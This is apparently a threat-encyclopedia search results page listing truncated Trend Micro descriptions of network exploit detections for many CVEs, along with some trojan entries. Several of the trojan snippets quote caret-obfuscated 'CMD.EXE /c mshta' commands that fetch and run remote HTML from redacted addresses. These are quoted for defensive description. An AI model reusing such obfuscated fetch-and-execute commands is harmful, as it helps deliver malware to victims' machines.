Search
Keyword: MS10-087
Description Name: CVE-2019-18935 - TELERIK UI RCE - HTTP(REQUEST) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for Point of Entry or Lateral Movement.The host exhibiting this type of netw...
Description Name: CVE-2021-44077 - REMOTE CODE EXECUTION EXPLOIT - HTTP(REQUEST) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for Point of Entry or Lateral Movement.The host exhibiting th...
Description Name: CVE-2021-44142 - BUFFER OVERFLOW EXPLOIT - SMB2(REQUEST) . This is Trend Micro detection for SMB2 network protocol that manifests exploit activities and can be used for Point of Entry or Lateral Movement.The host exhibiting this typ...
Description Name: CVE-2020-14864 - DIRECTORY TRAVERSAL EXPLOIT - HTTP(REQUEST) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for Point of Entry or Lateral Movement.The host exhibiting this...
Description Name: CVE-2022-22954 - WORKSPACE ONE RCE - HTTP(REQUEST) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for Point of Entry or Lateral Movement.The host exhibiting this type of n...
Description Name: CVE-2022-24086 - INPUT VALIDATION EXPLOIT - HTTP(REQUEST) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for Point of Entry or Lateral Movement.The host exhibiting this ty...
Description Name: Possible CVE-2020-11978 - APACHE AIRFLOW RCE EXPLOIT - HTTP(REQUEST) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for Point of Entry or Lateral Movement.The host exhibit...
following processes: CMD.EXE /c ms^hta http://{BLOCKED}.{BLOCKED}^40.{BLOCKED}.{BLOCKED}^68/oo/aa/s^e.ht^m^l mshta http://{BLOCKED}.{BLOCKED}.1{BLOCKED}.1{BLOCKED}/oo/aa/se.html Other Details This Trojan
Installation This Trojan adds the following processes: CMD.EXE /c ms^hta http://{BLOCKED}.2^{BLOCKED}.1{BLOCKED}.1^{BLOCKED}/vvv/ppp/f^e.ht^m^l mshta http://{BLOCKED}.2{BLOCKED}.1{BLOCKED}.1{BLOCKED
Installation This Trojan adds the following processes: CMD.EXE /c ms^hta http://{BLOCKED}.2^{BLOCKED}.1{BLOCKED}.1^{BLOCKED}/vvv/ppp/f^e.ht^m^l mshta http://{BLOCKED}.2{BLOCKED}.1{BLOCKED}.1{BLOCKED
Description Name: CVE-2022-0435 - TIPC BUFFEROVERFLOW EXPLOIT - UDP(REQUEST) . This is Trend Micro detection for UDP network protocol that manifests exploit activities and can be used for Point of Entry or Lateral Movement.The host exhibiting this ty...
This Potentially Unwanted Application arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
Description Name: CVE-2021-31166 - HTTP Protocol RCE Exploit - HTTP (REQUEST) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for Point of Entry or Lateral Movement.The host exhibiting this ...
Description Name: CVE-2022-30216 - WINDOWS SERVER SERVICES TAMPERING EXPLOIT - SMB2(REQUEST) . This is Trend Micro detection for packets passing through SMB2 network protocols that can be used as Point of Entry or Lateral Movement. This also indicate...
Description Name: CVE-2022-47966 - ZOHO MANAGEENGINE RCE - HTTP(REQUEST) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for Point of Entry or Lateral Movement.The host exhibiting this type ...
Description Name: CVE-2022-34721 - Windows Internet Key Exchange - Buffer Overflow RCE ISKAMP EXPLOIT - UDP(REQUEST) . This is Trend Micro detection for UDP network protocol that manifests exploit activities and can be used for Point of Entry or Late...
Description Name: CVE-2022-44877 - CENTOS WEB PANEL COMMAND INJECTION - HTTP(EXPLOIT) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for Point of Entry or Lateral Movement.The host exhibit...
Description Name: CVE-2022-1040 - SOPHOS FIREWALL USER PORTAL AND WEBADMIN REMOTE CODE EXECUTION - HTTP(EXPLOIT) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for Point of Entry or Lateral...
Description Name: CVE-2022-38129 - KEYSIGHT SMS DIRECTORY TRAVERSAL - HTTP(REQUEST) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for Point of Entry or Lateral Movement.The host exhibiting...